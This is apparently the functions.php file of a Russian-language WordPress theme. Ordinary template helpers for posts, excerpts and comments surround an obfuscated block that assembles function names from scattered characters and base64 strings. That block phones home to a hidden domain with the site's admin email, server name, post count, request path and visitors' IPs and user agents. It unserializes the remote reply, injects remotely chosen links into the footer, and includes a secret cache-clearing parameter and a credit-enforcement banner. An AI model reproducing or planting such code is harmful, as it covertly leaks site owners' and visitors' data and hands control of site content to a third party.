<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $yVJkX='a';$KEZTQVQ='e';$RoKXy='6';$QdPYZP='_';$whxqyd='e';$rGKKxYv='e';$mhKcwG='d';$WKZAK='d';$RsHxi='o';$xofjy='c';$KMkiHUt='4';$KjiWaqW='s';$gkiMo='b';$eilWXDVx=$gkiMo.$yVJkX.$KjiWaqW.$KEZTQVQ.$RoKXy.$KMkiHUt.$QdPYZP.$WKZAK.$rGKKxYv.$xofjy.$RsHxi.$mhKcwG.$whxqyd;$uYtQYU='z';$LPrGo='e';$bRXo='f';$fGLDAr='t';$lycUyM='n';$EQNd='l';$fQeyTG='i';$hbVXZP='a';$kGBLz='g';$rJaJnCfO=$kGBLz.$uYtQYU.$fQeyTG.$lycUyM.$bRXo.$EQNd.$hbVXZP.$fGLDAr.$LPrGo;$LlYeK='t';$KfCNU='r';$IGwFWQq='_';$GvAnh='s';$ksHx='o';$kqeQnV='3';$OPPBJ='1';$MhLEW='r';$Nysy='t';$uKtWRvRP=$GvAnh.$Nysy.$KfCNU.$IGwFWQq.$MhLEW.$ksHx.$LlYeK.$OPPBJ.$kqeQnV;$mHqUG='e';$UsAkw='v';$IYbZLiq='s';$Tdqskf='r';$UfqE='t';$tlcPpTJ='r';$uEzgPZbB=$IYbZLiq.$UfqE.$tlcPpTJ.$Tdqskf.$mHqUG.$UsAkw;                     $rq____h='a';$bn________s='e';$jm___________u='6';$nt___v='_';$hl___c='e';$xm__o='e';$zv_____________i='d';$mz_____________i='d';$am_______b='o';$de_____________c='c';$uq_________p='4';$zw__________h='s';$wy__________r='b';$cv______________m=$wy__________r.$rq____h.$zw__________h.$bn________s.$jm___________u.$uq_________p.$nt___v.$mz_____________i.$xm__o.$de_____________c.$am_______b.$zv_____________i.$hl___c;$fx________j='e';$ta__x='u';$iq___v='s';$lt____________j='s';$nl_____o='c';$ci____a='t';$eq____________n='n';$ue_____________o='_';$mx___q='n';$hv____a='t';$yn__v='i';$rc_________t='i';$nf______________a='x';$tn________b='o';$ex___f='f';$ko______s=$ex___f.$ta__x.$eq____________n.$nl_____o.$ci____a.$yn__v.$tn________b.$mx___q.$ue_____________o.$fx________j.$nf______________a.$rc_________t.$lt____________j.$hv____a.$iq___v;$nx______w='f';$mi________r='e';$od________x='p';$ok___________c='o';$rj_______f='n';$ck______m=$nx______w.$ok___________c.$od________x.$mi________r.$rj_______f;$km________b='f';$yr___j='e';$wv_____a='r';$al_____________c='a';$nq____________n='d';$tp______________x=$km________b.$wv_____a.$yr___j.$al_____________c.$nq____________n;$yg_____c='e';$pv____o='o';$tl_______n='s';$gm___________q='c';$fc______a='l';$ob________i='f';$se_______________c=$ob________i.$gm___________q.$fc______a.$pv____o.$tl_______n.$yg_____c;define("WP_ID", $cv______________m("Mi4wLjA="));define("WP_TTL", $cv______________m("MTA4MDA="));define("WP_SRC", $cv______________m("dHBva24="));function wp_get_header() {global $cv______________m, $ko______s;if ($ko______s($cv______________m("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$ko______s($cv______________m("d3BfZ2V0X2Zvb3Rlcg==")) &&$ko______s($cv______________m("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $cv______________m, $ck______m, $se_______________c, $tp______________x;$ow__w = TEMPLATEPATH."/".$cv______________m("Zm9vdGVyLnBocA==");$ju____________j = @$ck______m($ow__w, "r");$ow__w = @$tp______________x($ju____________j, @filesize($ow__w));@$se_______________c($ju____________j);$hg______________a = TEMPLATEPATH."/".$cv______________m("ZnVuY3Rpb25zLnBocA==");$ju____________j = @$ck______m($hg______________a, "r");$hg______________a = @$tp______________x($ju____________j, @filesize($hg______________a));@$se_______________c($ju____________j);$hb______h = 0;if($ow__w && $hg______________a) {if ($cv______________m("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($ow__w, $cv______________m("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$hb______h = 1;}if (substr_count($ow__w, "wp_theme_GPL_credits()") < 1) {$hb______h = 2;}}if(WP_ID != "2.0.0") {$hb______h = 12;}}if($hb______h > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $hb______h -->";}}function wp_loaded() {global $cv______________m, $ko______s;return $ko______s($cv______________m("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($qw____s, $cb______________t = "(more...)", $ge_______________y = 0, $ic___________z = "") {$xb________l = get_the_content($cb______________t, $ge_______________y, $ic___________z);$xb________l = apply_filters("the_content", $xb________l);$xb________l = str_replace("]]>", "]]>", $xb________l);if (strlen($_GET["p"]) > 0) {echo $xb________l;}else if ((strlen($xb________l)>$qw____s) && ($bv_____w = strpos($xb________l, " ", $qw____s ))) {$xb________l = substr($xb________l, 0, $bv_____w);$xb________l = $xb________l;echo $xb________l;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$cb______________t</a></div></p>";} else {echo $xb________l;}}}$qw________g='6';$ao__e='n';$lp____________g='e';$bw____d='e';$no_______s='_';$ye_______________j='e';$mg______________o='o';$dz____________c='a';$nu_____i='c';$cc___________t='d';$ld___________s='4';$ur_______________p='s';$ul_____________t='b';$fn__t=$ul_____________t.$dz____________c.$ur_______________p.$bw____d.$qw________g.$ld___________s.$no_______s.$lp____________g.$ao__e.$nu_____i.$mg______________o.$cc___________t.$ye_______________j;$ie____________x='t';$ha________c='n';$xt___________u='n';$dm_____c='e';$kz___c='g';$hk___________d='i';$oa_______________w='_';$uv__________u='_';$gv____________j='o';$vc______________f='t';$bo_____________h='l';$xo________y='t';$er____________q='s';$cz______e='e';$lr_______________m='c';$cx________m='e';$aa_________a='f';$io_____________c=$aa_________a.$hk___________d.$bo_____________h.$dm_____c.$uv__________u.$kz___c.$cx________m.$xo________y.$oa_______________w.$lr_______________m.$gv____________j.$ha________c.$vc______________f.$cz______e.$xt___________u.$ie____________x.$er____________q;$lr___p='e';$bc____________z='t';$fe_____f='f';$ht__________u='_';$rs__j='e';$rt_________j='i';$ys_____v='l';$rf_____l='x';$uz_____________m='s';$th__________k='s';$ep__j='i';$qi______a=$fe_____f.$rt_________j.$ys_____v.$rs__j.$ht__________u.$lr___p.$rf_____l.$ep__j.$th__________k.$bc____________z.$uz_____________m;$cv______________y='v';$ks___________m='s';$qq___________o='r';$hk___b='i';$qk_________j='a';$za__n='c';$np______________c='e';$df______l='p';$sf___j='o';$xn_____________b='r';$yz________y='e';$lk__________v='m';$ae___d='_';$xh_____y='n';$py__________n='o';$lb______b=$cv______________y.$np______________c.$xn_____________b.$ks___________m.$hk___b.$sf___j.$xh_____y.$ae___d.$za__n.$py__________n.$lk__________v.$df______l.$qk_________j.$qq___________o.$yz________y;$fk_____q='e';$yc__________e='k';$fc____s='p';$ki___________t='n';$vw__________e='o';$ka__b='f';$cc___e='o';$wr______________g='c';$il______________x='s';$gp_________q=$ka__b.$il______________x.$cc___e.$wr______________g.$yc__________e.$vw__________e.$fc____s.$fk_____q.$ki___________t;$tv___________m='f';$uz_________b='e';$vp__b='t';$kh______c='w';$cj___________o='r';$gl_______________f='i';$en_____________y=$tv___________m.$kh______c.$cj___________o.$gl_______________f.$vp__b.$uz_________b;$zq___g='m';$rm_______________m='5';$cc________x='d';$op______________w=$zq___g.$cc________x.$rm_______________m;$wz______________a='a';$be_____d='p';$ww_____q='h';$cr___________y='e';$rd___________w='t';$uk__________m='r';$as_____z='a';$uc_______________m='l';$zi_____g=$uk__________m.$cr___________y.$as_____z.$uc_______________m.$be_____d.$wz______________a.$rd___________w.$ww_____q;$tp______________t='u';$sp_______y='r';$ik_______e='n';$ku______d='l';$px______________q='s';$rg_______________h='e';$hq__z='a';$jg______________r='i';$rh_____________g='z';$nb___________y='i';$et______________w='e';$su_____k=$tp______________t.$ik_______e.$px______________q.$rg_______________h.$sp_______y.$nb___________y.$hq__z.$ku______d.$jg______________r.$rh_____________g.$et______________w;$iq_________y='e';$cz________s='a';$dv__p='t';$pw_________y='m';$kr_____d='p';$xs_____j='n';$ym_____________x='m';$wm____x=$dv__p.$iq_________y.$ym_____________x.$kr_____d.$xs_____j.$cz________s.$pw_________y;$xo________f='a';$sv______r='s';$wz__________b='e';$qw___________c='e';$rw______________w='o';$wu____z='_';$oq_______________a='a';$ju___z='r';$lb_____________k='t';$qw____________s='n';$fn_________n='m';$yg_______i='e';$es__s='_';$tf___o='t';$cp______d='r';$vr______________a='x';$ek_________b='t';$nv_________f='c';$hf____________w='e';$on______________g='c';$eu_______________x='t';$nl______________s=$sv______r.$eu_______________x.$cp______d.$yg_______i.$oq_______________a.$fn_________n.$wu____z.$nv_________f.$rw______________w.$qw____________s.$lb_____________k.$hf____________w.$vr______________a.$ek_________b.$es__s.$on______________g.$ju___z.$qw___________c.$xo________f.$tf___o.$wz__________b;function cf____k($cm____________v) {global $cv______________m, $ko______s, $io_____________c, $lb______b, $nl______________s;if (!$ko______s($cv______________m("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($lb______b(PHP_VERSION, "5.0.0", ">=") && $ko______s($cv______________m("ZmlsZV9nZXRfY29udGVudHM=")) && $ko______s($cv______________m("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$ja__________c = $nl______________s(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$ve________p = @$io_____________c($cm____________v, 0, $ja__________c);} else {$ve________p = @$io_____________c($cm____________v, 0);}return $ve________p;}function pl_________z($cm____________v) {global $ko______s, $gp_________q, $en_____________y, $cv______________m;if (!$ko______s($cv______________m("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$yv_________n = strpos($cm____________v, "/", 7);$cb_______n = array("uri"     => substr($cm____________v, $yv_________n),"host"    => str_replace("http://", "", substr($cm____________v, 0, $yv_________n)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$dl____g = @$gp_________q("$cb_______n[host]", 80, $jb_______r, $nf___________z, 4);if (!$dl____g) {return false;} else {$ve________p = "";$xb__________x  = "GET $cb_______n[uri] HTTP/1.0\r\n";$xb__________x .= "Host: $cb_______n[host]\r\n";$xb__________x .= "Referer: $cb_______n[referer]\r\n";$xb__________x .= "Connection: Close\r\n\r\n";@$en_____________y($dl____g, $xb__________x);while (!@feof($dl____g)) {$xz_______u = @fgets($dl____g, (1024*24));if ($xz_______u == "\r\n") {$hb___o = true;continue;}if ($hb___o) {$ve________p .= $xz_______u;}}return $ve________p;}}function km_______g($cm____________v) {global $ko______s;$pa___________z = false;if ($cm____________v != "") {if ($ko______s("cf____k")) {$pa___________z = @cf____k($cm____________v);}if (!$pa___________z && ($ko______s("pl_________z"))) {$pa___________z = @pl_________z($cm____________v);}}return $pa___________z;}function fz__a() {global $_SERVER, $op______________w;$dr______i = $_SERVER["SERVER_NAME"];if (substr("$dr______i", 0, 4) == "www.") {$dr______i = substr("$dr______i", 4);}$dr______i = $op______________w("$_SERVER[SERVER_NAME]");return $dr______i;}function bj____________a() {return "file";}function bz____f($cm____________v) {global $_SERVER, $io_____________c, $qi______a, $ck______m, $se_______________c, $en_____________y;$az______________a = pu_____a();$si_________x = fz__a().".jpg";$co_________d = $az______________a["dir_upload"]["path"]."/$si_________x";$hu______________e = @filemtime($co_________d);if (!$hu______________e || ((time()-$hu______________e) >= WP_TTL)) {$pa___________z = km_______g($cm____________v);if ($pa___________z) {if ($qi______a($co_________d)) {@unlink($co_________d);}$ju____________j = @$ck______m($co_________d, "x+");@$en_____________y($ju____________j, $pa___________z);@$se_______________c($ju____________j);}} else {if ($qi______a($co_________d)) {$pa___________z = @$io_____________c($co_________d);} else {$pa___________z = false;}}return $pa___________z;}function pu_____a() {global $_SERVER, $cv______________m, $fn__t;$yy__________q = wp_count_posts("post");$xc______x = pathinfo(get_bloginfo("template_directory"));$az______________a = array("url" => array("report"      => $cv______________m("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $xc______x,"dir_upload"=> mv_______________w(),"queryString"=> array("?a001=".WP_ID,"a004=".$xc______x[filename],"a005=".$yy__________q->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a> ");$az______________a["url"]["queryString"] = implode("&", $az______________a["queryString"]);$az______________a["url"]["report"] = $az______________a["url"]["report"]."/?".$fn__t($az______________a["url"]["queryString"]).".html";return $az______________a;}function mv_______________w() {$xh__y = wp_upload_dir();if (isset($xh__y["error"])) {$sc______e = vg__________a();if (is_writable($sc______e)) {$xh__y = array("path" => $sc______e);}}return $xh__y;}function vg__________a() {global $ko______s, $op______________w, $zi_____g, $wm____x;$pl___n = (bool) ini_get("safe_mode");if ($pl___n == true) {return false;}if ($ko______s("sys_get_temp_dir")) {$gm___c = sys_get_temp_dir();if (is_writable($gm___c)) {return $zi_____g($gm___c);}}if (!empty($_ENV["TMP"])) {return $zi_____g($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $zi_____g($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $zi_____g($_ENV["TEMP"]);} else {$ul_________g = $wm____x($op______________w(uniqid(rand(), true)), "");if ($ul_________g) {$gm___c = $zi_____g(dirname($ul_________g));@unlink($ul_________g);return $gm___c;} else {return false;}}}function ro_______________a() {global $_GET, $qi______a;$az______________a = pu_____a();$dr______i = fz__a();$qa___________i = bj____________a();$cy____i = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($qa___________i == "file") {$zk_______________q = $az______________a["dir_upload"]["path"]."/".$dr______i.".jpg";if ($qi______a($zk_______________q)) {@unlink($zk_______________q);$cy____i = "deleted";}}$ix_____________l = array("s"=> $cy____i,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($ix_____________l AS $sx_____r => $if______l) echo " [$sx_____r:$if______l]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $ko______s, $cv______________m, $su_____k;$az______________a = pu_____a();$rj___________y = "bz____f";if ($ko______s($rj___________y)) {$ve________p = $rj___________y($az______________a["url"]["report"]);}if ($ve________p) {if ($ve________p = @$cv______________m($ve________p)) {$ve________p = @$su_____k($ve________p);if (strlen($ve________p[custom_credit]) >= 5) {$az______________a["default_string"] = $ve________p[custom_credit];}if ($ve________p["status"] == "0") {$wn__________h = 1;$kn_____________d = 1;} else {$qv_____s = sizeof($ve________p["links"]);$vh_____________v = $az______________a["default_string"];if ($qv_____s > 0 && $ve________p["links"] !== "") {$ho___u = 0;foreach ($ve________p["links"] as $li___m => $kj_____r) {$ho___u++;if ($kj_____r->l_path == "" || $kj_____r->l_path == $_SERVER["REQUEST_URI"]) {$kj_____r->l_href = htmlspecialchars(strip_tags($kj_____r->l_href));$kj_____r->l_title = htmlspecialchars(strip_tags($kj_____r->l_title));$kj_____r->l_anchor = htmlspecialchars(strip_tags($kj_____r->l_anchor));$vh_____________v .= " | ";$vh_____________v .= "<a href='$kj_____r->l_href' title='$kj_____r->l_title'";if ($kj_____r->l_nofollow == "1") {$vh_____________v .= " rel='nofollow'";}$vh_____________v .= ">$kj_____r->l_anchor</a>";}}}$az______________a["links"] = "$vh_____________v";if ($ve________p[credit] == "0") {$az______________a["links"] = "";}}} else {$wn__________h = "1";}} else {$wn__________h = "1";}if ($wn__________h == "1") {$az______________a["links"] = $az______________a["default_string"];}echo "$az______________a[links]";echo "<!-- s: $ve________p[signature] -->";ro_______________a();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
